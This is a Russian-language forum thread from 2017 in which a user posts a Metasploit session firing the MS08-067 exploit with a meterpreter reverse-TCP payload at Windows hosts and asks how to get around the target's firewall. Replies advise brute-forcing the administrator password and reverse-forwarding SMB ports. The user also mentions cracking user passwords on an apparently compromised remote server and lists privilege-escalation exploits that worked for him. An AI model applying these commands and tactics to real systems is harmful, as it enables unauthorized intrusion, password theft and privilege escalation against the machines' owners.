HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.02.2017, 18:41
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию

Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.

msf > use exploit/windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3

RHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1

LHOST => 192.168.0.1

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.1:4444

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).[*] Exploit completed, but no session was created.

Можно ли как-то обойти это при включенном фаерволе ?

Какой бы еще попробовать эксплойт.

Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
 
Ответить с цитированием

  #2  
Старый 06.02.2017, 19:23
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от roman921  
roman921 said:

Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3

RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).[*] Exploit completed, but no session was created.
Можно ли как-то обойти это при включенном фаерволе ?
Какой бы еще попробовать эксплойт.
Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
Так и не будет работать, если целевой порт сервиса закрыт фаерволом.
 
Ответить с цитированием

  #3  
Старый 06.02.2017, 19:35
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Так и не будет работать, если целевой порт сервиса закрыт фаерволом.
А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ?

Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что
[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.

Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
 
Ответить с цитированием

  #4  
Старый 06.02.2017, 19:43
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от roman921  
roman921 said:

А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ?
Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.
Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
Можно в фаерволе добавить правило, которое к нужному порту разрешит доступ. Я давно метасплойт не юзал, но в последнем случае скорее всего версия ОС на машине просто не подвержена уязвимости.
 
Ответить с цитированием

  #5  
Старый 06.02.2017, 19:48
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Можно в фаерволе добавить правило
Без прав админа вроде нельзя ?
 
Ответить с цитированием

  #6  
Старый 06.02.2017, 20:12
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от roman921  
roman921 said:

Без прав админа вроде нельзя ?
Нельзя
 
Ответить с цитированием

  #7  
Старый 07.02.2017, 01:16
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию

А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.

Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды.

Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.*

Вот нашел их на гитхаб, https://github.com/rapid7/metasploit.../windows/local

У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
 
Ответить с цитированием

  #8  
Старый 07.02.2017, 12:51
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от roman921  
roman921 said:

А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.
Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды.
Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.*
Вот нашел их на гитхаб,
https://github.com/rapid7/metasploit.../windows/local
У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
Эти эксплойты на руби написаны, и они идут как часть msf а не самостоятельные программы. Вообще такого рода вопросы можно на форуме метасплойта и задавать.
 
Ответить с цитированием

  #9  
Старый 07.02.2017, 16:41
binarymaster
Guest
Сообщений: n/a
Провел на форуме:
997379

Репутация: 125
По умолчанию

Цитата:
Сообщение от roman921  
roman921 said:

А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу.
Если есть юзерский аккаунт, можно с него попробовать пробрутить админский.

Цитата:
Сообщение от roman921  
roman921 said:

Без прав админа вроде нельзя ?
Если брут не прокатит, ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то. И msf-ом атаковать уже проброшенные порты.

Дальше вопрос только в том, чтобы начинка дала бэк-коннект на правильный IP и порт.
 
Ответить с цитированием

  #10  
Старый 07.02.2017, 23:41
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию

Цитата:
Сообщение от binarymaster  
binarymaster said:

Если есть юзерский аккаунт, можно с него попробовать пробрутить админский.
Обычно через nt-passworder ставлю на 5-7 цифр бруты, на одном дедике у многих юзеров оказались пассы 4,5 цифр, а админы не поддались. Интересно почему так, юзеры у админов просят простые им пассы ставить ? А сами админы себе видать сложное ставят.

Цитата:
Сообщение от binarymaster  
binarymaster said:

ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то.
Ну вот такая идея как раз о пробросе я и думал, но это я так понимаю нужно в роутер попасть.

Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал.

А на 2003 чет не получается, которые с r2 sp2.

Может кто делал подборку эксплойтов собранных для повышения прав, заметил, что в exploit-db эти эксплойты часто надо доправлять по мелким ошибкам, к примеру, многие там почему-то забывают выделять память указателям структур)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ